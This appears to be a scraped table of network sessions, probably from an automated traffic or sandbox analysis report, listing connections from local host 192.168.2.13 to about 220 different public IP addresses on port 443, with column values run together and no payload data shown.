                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11742192.168.2.134814281.176.83.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11743192.168.2.1352954148.189.9.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11744192.168.2.1350772185.63.96.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11745192.168.2.1348386171.107.215.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11746192.168.2.135305435.0.213.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11747192.168.2.1347442223.50.251.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11748192.168.2.134270480.122.162.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11749192.168.2.1333538205.19.142.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11750192.168.2.1342490140.96.136.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11751192.168.2.1347162158.230.103.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11752192.168.2.134929475.11.42.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11753192.168.2.1348436116.71.72.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11754192.168.2.1356398156.212.187.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11755192.168.2.1345966106.129.254.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11756192.168.2.1339122106.195.249.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11757192.168.2.1337056221.119.176.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11758192.168.2.135645424.192.90.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11759192.168.2.1348650126.234.47.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11760192.168.2.1355522181.100.251.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11761192.168.2.133435280.183.224.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11762192.168.2.135817246.121.126.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11763192.168.2.1338550176.189.144.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11764192.168.2.1354750108.4.195.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11765192.168.2.1343230220.244.206.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11766192.168.2.1344704138.150.232.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11767192.168.2.133615269.123.43.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11768192.168.2.135244460.129.110.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11769192.168.2.13462222.43.227.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11770192.168.2.1336050165.230.202.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11771192.168.2.135739472.44.195.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11772192.168.2.1341670209.133.235.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11773192.168.2.135397238.242.0.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11774192.168.2.1339902133.18.151.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11775192.168.2.135218089.105.31.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11776192.168.2.1347830128.68.181.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11777192.168.2.134986653.164.196.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11778192.168.2.1343308166.119.214.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11779192.168.2.135080624.188.5.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11780192.168.2.1352802126.150.132.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11781192.168.2.1348198153.134.84.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11782192.168.2.1339050136.57.94.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11783192.168.2.13569069.109.92.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11784192.168.2.1357162174.226.79.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11785192.168.2.1340058219.213.240.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11786192.168.2.1353334163.65.79.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11787192.168.2.1338468207.196.33.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11788192.168.2.133668287.59.190.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11789192.168.2.1345870199.246.26.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11790192.168.2.1360784192.137.5.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11791192.168.2.133444675.58.4.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11792192.168.2.135245644.143.6.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11793192.168.2.1335378134.77.72.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11794192.168.2.1343202113.166.46.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11795192.168.2.135842039.8.165.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11796192.168.2.134430445.144.33.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11797192.168.2.134677069.218.83.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11798192.168.2.1350678216.126.26.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11799192.168.2.135230697.71.177.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11800192.168.2.1354230126.66.254.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11801192.168.2.1358576157.23.157.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11802192.168.2.133481271.15.94.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11803192.168.2.135513071.217.200.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11804192.168.2.135816280.173.3.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11805192.168.2.1347552175.99.110.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11806192.168.2.1345448161.201.44.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11807192.168.2.1360948143.129.2.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11808192.168.2.133874641.105.178.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11809192.168.2.1340686133.195.66.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11810192.168.2.134626281.38.175.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11811192.168.2.1338040177.221.161.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11812192.168.2.1352226220.139.213.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11813192.168.2.1345440189.25.45.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11814192.168.2.133889872.70.96.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11815192.168.2.1356514137.94.122.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11816192.168.2.1338034121.41.189.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11817192.168.2.134706296.22.158.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11818192.168.2.1334632173.151.22.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11819192.168.2.134500497.251.43.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11820192.168.2.1345668223.213.199.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11821192.168.2.1345464141.175.77.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11822192.168.2.1344628206.172.115.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11823192.168.2.1344050109.171.118.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11824192.168.2.1349232174.211.94.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11825192.168.2.1340520118.71.157.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11826192.168.2.1337694143.107.218.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11827192.168.2.1359108155.211.182.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11828192.168.2.1355736102.178.41.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11829192.168.2.1344020201.48.14.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11830192.168.2.134133254.118.106.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11831192.168.2.1340876190.27.87.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11832192.168.2.133462489.9.239.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11833192.168.2.134128695.93.8.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11834192.168.2.1349602109.181.118.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11835192.168.2.1350182196.77.41.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11836192.168.2.1358748108.129.153.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11837192.168.2.134348242.148.200.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11838192.168.2.133397049.189.152.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11839192.168.2.135299660.194.179.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11840192.168.2.1341138112.250.110.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11841192.168.2.1334886104.140.235.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11842192.168.2.133431887.195.102.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11843192.168.2.1346874187.27.200.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11844192.168.2.1343714174.0.10.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11845192.168.2.1336110105.204.69.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11846192.168.2.134420475.122.87.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11847192.168.2.134654064.128.64.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11848192.168.2.133554474.8.73.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11849192.168.2.135414258.136.0.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11850192.168.2.1359242186.216.103.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11851192.168.2.1355540176.161.52.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11852192.168.2.1354066109.190.124.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11853192.168.2.135362478.127.95.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11854192.168.2.1333962202.154.75.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11855192.168.2.1350084114.126.57.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11856192.168.2.1334900136.12.191.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11857192.168.2.134649046.0.225.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11858192.168.2.1345766134.63.15.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11859192.168.2.1343994223.112.143.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11860192.168.2.133364681.104.28.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11861192.168.2.1338980212.234.90.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11862192.168.2.134609436.236.142.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11863192.168.2.1343618170.12.125.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11864192.168.2.133939885.65.139.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11865192.168.2.134716236.123.227.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11866192.168.2.1352264203.18.77.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11867192.168.2.133792437.30.164.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11868192.168.2.134058093.17.118.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11869192.168.2.1352522208.245.208.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11870192.168.2.1344736155.204.226.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11871192.168.2.1344314148.124.59.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11872192.168.2.134756813.223.143.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11873192.168.2.1344964149.112.174.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11874192.168.2.133697843.196.172.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11875192.168.2.1349202208.180.185.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11876192.168.2.1351214125.197.124.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11877192.168.2.1350810203.48.168.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11878192.168.2.134895861.36.212.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11879192.168.2.1350306124.96.42.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11880192.168.2.1342918143.173.102.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11881192.168.2.1352466115.232.222.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11882192.168.2.1341716191.255.166.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11883192.168.2.13483468.176.20.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11884192.168.2.133595080.234.221.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11885192.168.2.135549260.26.62.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11886192.168.2.136067687.99.126.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11887192.168.2.1354342101.93.251.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11888192.168.2.1344422156.132.47.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11889192.168.2.1360154163.69.87.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11890192.168.2.133413231.235.144.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11891192.168.2.1353930112.161.3.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11892192.168.2.135158839.84.54.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11893192.168.2.1348240151.53.136.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11894192.168.2.135610293.83.97.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11895192.168.2.133990036.16.244.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11896192.168.2.1342958104.63.50.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11897192.168.2.1334076112.223.136.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11898192.168.2.134649854.180.48.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11899192.168.2.1347112177.228.251.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11900192.168.2.1357920124.175.243.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11901192.168.2.135895453.132.117.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11902192.168.2.1341540181.28.10.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11903192.168.2.1358454223.206.253.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11904192.168.2.1339166128.77.250.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11905192.168.2.134951840.61.219.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11906192.168.2.134183678.52.0.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11907192.168.2.1348530187.81.199.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11908192.168.2.133403223.110.144.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11909192.168.2.1333648146.80.241.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11910192.168.2.135194695.188.48.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11911192.168.2.1337908209.139.75.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11912192.168.2.1342076204.95.37.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11913192.168.2.1355024193.236.235.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11914192.168.2.1338658130.36.130.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11915192.168.2.134351662.222.255.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11916192.168.2.135543840.132.207.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11917192.168.2.1338996216.60.128.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11918192.168.2.13371021.198.15.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11919192.168.2.136031084.56.186.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11920192.168.2.1349310154.161.83.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11921192.168.2.1344464137.38.91.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11922192.168.2.1336018102.213.184.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11923192.168.2.134094254.102.117.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11924192.168.2.1341424125.232.230.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11925192.168.2.133619275.163.163.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11926192.168.2.133894260.73.81.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11927192.168.2.1356690109.5.93.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11928192.168.2.133972446.224.215.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11929192.168.2.1350716177.254.173.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11930192.168.2.1348268172.100.197.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11931192.168.2.1358104148.252.253.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11932192.168.2.134332481.245.172.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11933192.168.2.1345364121.118.223.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11934192.168.2.133540038.230.217.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11935192.168.2.1357016109.233.118.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11936192.168.2.13496624.229.80.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11937192.168.2.135589831.29.82.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11938192.168.2.1340392186.135.171.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11939192.168.2.1336486109.119.38.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11940192.168.2.1347352221.225.114.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11941192.168.2.1360400184.116.178.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11942192.168.2.1340568178.57.50.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11943192.168.2.1342426218.144.119.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11944192.168.2.1353754185.42.167.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11945192.168.2.1357366164.112.201.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11946192.168.2.134096227.231.164.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11947192.168.2.134464619.155.125.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11948192.168.2.1360758217.177.254.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11949192.168.2.1351652129.36.55.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11950192.168.2.133864284.217.191.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11951192.168.2.135428468.149.154.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11952192.168.2.135435834.214.183.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11953192.168.2.1344478176.164.39.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11954192.168.2.1346494213.235.24.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11955192.168.2.134904420.42.229.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11956192.168.2.1353760179.157.228.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11957192.168.2.1343586222.11.210.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11958192.168.2.1351324181.214.90.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11959192.168.2.1353434208.252.144.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11960192.168.2.134260218.196.115.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11961192.168.2.134084067.194.221.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11962192.168.2.1344664179.5.249.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
